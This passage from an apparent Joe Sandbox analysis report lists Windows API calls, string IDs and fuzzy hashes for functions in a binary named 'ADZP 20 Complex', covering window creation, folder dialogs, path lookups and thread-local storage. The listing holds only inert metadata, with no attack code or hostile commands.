                    • Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
                    • Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
                    • Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                      • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                      • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                    • GetStockObject.GDI32(00000011), ref: 00408FB2
                    • LoadIconW.USER32 ref: 00408FE9
                    • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                    • RegisterClassExW.USER32 ref: 00409021
                    • IsWindowEnabled.USER32(00000000), ref: 00409048
                    • EnableWindow.USER32(00000000), ref: 00409059
                    • GetSystemMetrics.USER32(00000001), ref: 00409091
                    • GetSystemMetrics.USER32(00000000), ref: 0040909E
                    • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                    • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                    • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                    • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                    • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                    • wcslen.MSVCRT ref: 00409189
                    • wcslen.MSVCRT ref: 00409191
                    • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                    • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                    • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                    • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                    • SetForegroundWindow.USER32(00000000), ref: 0040921F
                    • BringWindowToTop.USER32(00000000), ref: 00409226
                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                    • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                    • TranslateMessage.USER32(?), ref: 00409259
                    • DispatchMessageW.USER32(?), ref: 00409264
                    • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                    • wcslen.MSVCRT ref: 00409289
                    • wcscpy.MSVCRT ref: 004092A1
                    • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                    • String ID: 0$BUTTON$D0A$EDIT$STATIC
                    • API String ID: 54849019-2968808370
                    • Opcode ID: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
                    • Opcode Fuzzy Hash: a182f17251ce321d778d7634bfe8f157872b1c2c0697115c82c91e82e7d6380d
                    • Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 004057F0: wcsncmp.MSVCRT(00000000,?,?,?,?,-0000012C,?,?,00402252,00000000,00000002,00000000,00000000,00417024,00000001,00000000), ref: 00405853
                      • Part of subcall function 004057F0: memmove.MSVCRT ref: 004058E1
                      • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                      • Part of subcall function 0040AD45: wcsncpy.MSVCRT ref: 0040AD63
                      • Part of subcall function 0040AD45: wcslen.MSVCRT ref: 0040AD75
                      • Part of subcall function 0040AD45: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040ADB5
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                    • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$\pA$\pA$\pA$\pA$\pA
                    • API String ID: 1295435411-2952853158
                    • Opcode ID: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction ID: 61c24dd49085b80bd1b70adcfbfbd818be60928fccba90bb55e88b0b877bbf77
                    • Opcode Fuzzy Hash: d64868e5c00eaaf1b55b8d26c688d327ecd9e6ef433e22dfa90474c3973bb521
                    • Instruction Fuzzy Hash: AEB11FB1104304BED600BB62DD8297F77A9EB88708F50CD3FB144A61E2EA3DDD55962E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • CoInitialize.OLE32(00000000), ref: 00409373
                      • Part of subcall function 0040EA90: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040EA9A
                    • memset.MSVCRT ref: 00409381
                    • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                    • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                    • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                    • wcsncpy.MSVCRT ref: 004093DD
                    • wcslen.MSVCRT ref: 004093F1
                    • CoTaskMemFree.OLE32(?), ref: 0040947A
                    • wcslen.MSVCRT ref: 00409481
                    • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                    • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                    • API String ID: 4193992262-92458654
                    • Opcode ID: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction ID: dd14e0d5c7aaf6d086be5bb491997024bece532a8fadf3e5f1c49f9ab44bf52d
                    • Opcode Fuzzy Hash: 4992d49dd3de5c3f1859f7f66b903f930d521af3df3d93c459ab95a70e3c859f
                    • Instruction Fuzzy Hash: 43414471508304AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B5A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • wcsncpy.MSVCRT ref: 00406405
                      • Part of subcall function 0040E880: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402F92,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E88A
                    • _wcsdup.MSVCRT ref: 0040644E
                    • _wcsdup.MSVCRT ref: 00406469
                    • _wcsdup.MSVCRT ref: 0040648C
                    • wcsncpy.MSVCRT ref: 00406578
                    • free.MSVCRT(?), ref: 004065DC
                    • free.MSVCRT(?), ref: 004065EF
                    • free.MSVCRT(?), ref: 00406602
                    • wcsncpy.MSVCRT ref: 0040662E
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: _wcsdupfreewcsncpy$Value
                    • String ID: $0A$$0A$$0A
                    • API String ID: 1554701960-360074770
                    • Opcode ID: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction ID: 8dd6decbfdfb2e9f9ed0212bb19f765ed94392260ea2aa670051c2f9137328dc
                    • Opcode Fuzzy Hash: 50c0b281b621336e4783d2df5908e4d1d9710958fa3a9793cbe9cd8f60bad7d8
                    • Instruction Fuzzy Hash: 27A1BD715043019BCB209F18C881A2BB7F1EF94348F49493EFC8667391E77AD965CB9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E900: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E90C
                      • Part of subcall function 0040E900: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E967
                    • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040AEE3
                    • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040AEF5
                    • wcscpy.MSVCRT ref: 0040AF1B
                    • wcscat.MSVCRT ref: 0040AF26
                    • wcslen.MSVCRT ref: 0040AF2C
                    • CoTaskMemFree.OLE32(?,00000000,00000000,?,020A9F70,00000000,00000000), ref: 0040AF3A
                    • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,0040373D,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000), ref: 0040AF41
                    • wcscat.MSVCRT ref: 0040AF59
                    • wcslen.MSVCRT ref: 0040AF5F
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FreeLibrarywcscatwcslen$AddressAllocateHeapLoadProcTaskValuewcscpy
                    • String ID: Downloads\$SHGetKnownFolderPath$Shell32.DLL
                    • API String ID: 1878685483-287042676
                    • Opcode ID: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction ID: 692465ff5638a5220195cb25a460cc83d5c0d74b8cd54d9d2378aa313f557f39
                    • Opcode Fuzzy Hash: ad09f511d23b933faec5afe470d0aa094d12b013be087039f3c77e99aed8eb9a
                    • Instruction Fuzzy Hash: 59210DB12483037AC121A7629C4AF6B3968DB51B95F10043FF505B51C1DABCC96195AF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • TlsAlloc.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412732
                    • InitializeCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041273E
                    • TlsGetValue.KERNEL32(?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000), ref: 00412754
                    • HeapAlloc.KERNEL32(00000008,00000014,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041276E
                    • EnterCriticalSection.KERNEL32(004186E8,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000), ref: 0041277F
                    • LeaveCriticalSection.KERNEL32(004186E8,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 0041279B
                    • GetCurrentProcess.KERNEL32(00000000,00100000,00000000,00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000), ref: 004127B4
                    • GetCurrentThread.KERNEL32 ref: 004127B7
                    • GetCurrentProcess.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127BE
                    • DuplicateHandle.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127C1
                    • RegisterWaitForSingleObject.KERNEL32(0000000C,00000000,0041281A,00000000,000000FF,00000008), ref: 004127D7
                    • TlsSetValue.KERNEL32(00000000,?,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127E4
                    • HeapAlloc.KERNEL32(00000000,0000000C,?,?,0040E6B8,0040E620,00000000,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000), ref: 004127F5
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocCriticalCurrentSection$HeapProcessValue$DuplicateEnterHandleInitializeLeaveObjectRegisterSingleThreadWait
                    • String ID:
                    • API String ID: 298514914-0
                    • Opcode ID: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction ID: 7332ff317071e0a972604479ba3dd7ff9d073507a24f1d64326450f2c9127e0c
                    • Opcode Fuzzy Hash: 2e736260770be91d420535d1c957e5431970d5774848fb61a6feb3a44565c38a
                    • Instruction Fuzzy Hash: 36210770644301BFDB119F60ED88B967FB9FB08761F14C43AF505A62A1CBB49850CB68
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowsDirectoryW.KERNEL32(00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032AE
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032B7
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 004033D7
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000800,00000000,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 004033E0
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(020A0000,00000000,?,?), ref: 0040E5BC
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,sysnative,00000000,00000000,00000000,00000000,00000800,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 004032E7
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(020A0000,00000000,?), ref: 0040E599
                    • GetSystemDirectoryW.KERNEL32(00000000,00000800), ref: 00403414
                    • PathAddBackslashW.SHLWAPI(00000000,00000000,00000800,00000000,00000000,?,00000000,00000000), ref: 0040341D
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                     • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                     • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: BackslashPath$Directory$AllocateErrorHeapLastSystemValue$Windows
                    • String ID: sysnative
                    • API String ID: 3406704365-821172135
                    • Opcode ID: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction ID: e6855e8cc6b59ba75e59fbb34a632fbdfc5c60153de78cbca022c055a9fde60a
                    • Opcode Fuzzy Hash: ffb34744e6d629d9349e21e7cca883396b6f40e9af2640bea7bdd6565dd5fdd2
                    • Instruction Fuzzy Hash: 83510A75118201BAD600BBB3DC82E3F66A9EB8075CF10CC3EB144751E2EA3DD9655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • LoadLibraryW.KERNEL32(Kernel32.dll,00000000,00000000,00000000,00000004,00000000,0040DED5,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010), ref: 0040E0D1
                    • GetProcAddress.KERNEL32(00000000,InitOnceExecuteOnce), ref: 0040E0E6
                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E101
                    • InterlockedCompareExchange.KERNEL32(00000000,00000001,00000000), ref: 0040E110
                    • Sleep.KERNEL32(00000000,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040E122
                    • InterlockedExchange.KERNEL32(00000000,00000002), ref: 0040E135
                    Strings
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: ExchangeInterlockedLibrary$AddressCompareFreeLoadProcSleep
                    • String ID: InitOnceExecuteOnce$Kernel32.dll
                    • API String ID: 2918862794-1339284965
                    • Opcode ID: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction ID: f1debd77009d833240bff916e076c3bff8506a5db62120b34ae0b3aef6ef2b9b
                    • Opcode Fuzzy Hash: 5ce0d2485c1bb4decbbcb922162a80cd5c7d15fe9eeb9708d5254b12b909fa63
                    • Instruction Fuzzy Hash: 3001D431244214FBD6201FA2DC4DFEB7B79EB45B52F10883AF501B51C0EAB85D21C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00409511
                    • GetCurrentThreadId.KERNEL32 ref: 0040951F
                    • IsWindowVisible.USER32(?), ref: 00409526
                      • Part of subcall function 0040E1F2: HeapAlloc.KERNEL32(00000008,00000000,0040DA6C,00418670,00000014,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040E1FE
                    • GetCurrentThreadId.KERNEL32 ref: 00409543
                    • GetWindowLongW.USER32(?,000000EC), ref: 00409550
                    • GetForegroundWindow.USER32 ref: 0040955E
                    • IsWindowEnabled.USER32(?), ref: 00409569
                    • EnableWindow.USER32(?,00000000), ref: 00409579
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$Thread$Current$AllocEnableEnabledForegroundHeapLongProcessVisible
                    • String ID:
                    • API String ID: 3383493704-0
                    • Opcode ID: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction ID: 39f81579f69f96c849a8792b8e2bccb0372a8aae8c011f207204c0ba92c0e649
                    • Opcode Fuzzy Hash: 68a633d90a34132dfb5e2fdbc66a21f5e6654eddc9afd13cb677bbd48b54e552
                    • Instruction Fuzzy Hash: 2E01DD321083016FD3219B7ADC88AABBBF8AF51760B04803EF446D3291D7748C40C66D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • DestroyWindow.USER32(?), ref: 00408EED
                    • GetWindowLongW.USER32(?,000000EB), ref: 00408EFC
                    • GetWindowTextLengthW.USER32 ref: 00408F0A
                    • HeapAlloc.KERNEL32(00000000), ref: 00408F1F
                    • GetWindowTextW.USER32(00000000,00000001), ref: 00408F2F
                    • DestroyWindow.USER32(?), ref: 00408F3D
                    • UnregisterClassW.USER32 ref: 00408F53
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$DestroyText$AllocClassHeapLengthLongUnregister
                    • String ID:
                    • API String ID: 2895088630-0
                    • Opcode ID: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction ID: 1940c3daec6268f5e5453f2abd6c11195bb238337c9a47dace4bef07d760dbb1
                    • Opcode Fuzzy Hash: 95d800774705508cbc5b0801488b835211eb90fc9c6ab37156a63b4f6fedfd03
                    • Instruction Fuzzy Hash: 9011FA3110821AFFCB115F64ED4C9E63F76EB18365B10C17AF845A2AB0CF359951EB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • EnumWindows.USER32(00409507,?), ref: 0040959B
                    • GetCurrentThreadId.KERNEL32 ref: 004095B3
                    • SetWindowPos.USER32(?,000000FE,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 004095CF
                    • GetCurrentThreadId.KERNEL32 ref: 004095EF
                    • EnableWindow.USER32(?,00000001), ref: 00409605
                    • SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000003,?,?,?,?,?), ref: 0040961C
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Window$CurrentThread$EnableEnumWindows
                    • String ID:
                    • API String ID: 2527101397-0
                    • Opcode ID: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction ID: 1b506e7c949c81e82e84a7d7bfb29e48a0d3001387cd43cbe5fa1ceb5ac7c4b4
                    • Opcode Fuzzy Hash: 63874de7abb22210dce27e7498091370d04ccb8537cec92ca55daa4cf010ce04
                    • Instruction Fuzzy Hash: D211D032149741BBD7324F16EC48F57BBB9EB81B20F148A3EF065226E1DB766C44CA18
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • TlsAlloc.KERNEL32(?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040D9F8
                    • HeapAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA0C
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA19
                    • TlsGetValue.KERNEL32(00000010,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA30
                    • HeapReAlloc.KERNEL32(00000008,00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA3F
                    • TlsSetValue.KERNEL32(00000000,?,?,?,?,00409674,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 0040DA4E
                    Memory Dump Source
                    • Source File: 0000001E.00000002.3238807984.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 0000001E.00000002.3238392053.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3238894702.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239106452.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 0000001E.00000002.3239151888.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_30_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: AllocValue$Heap
                    • String ID:
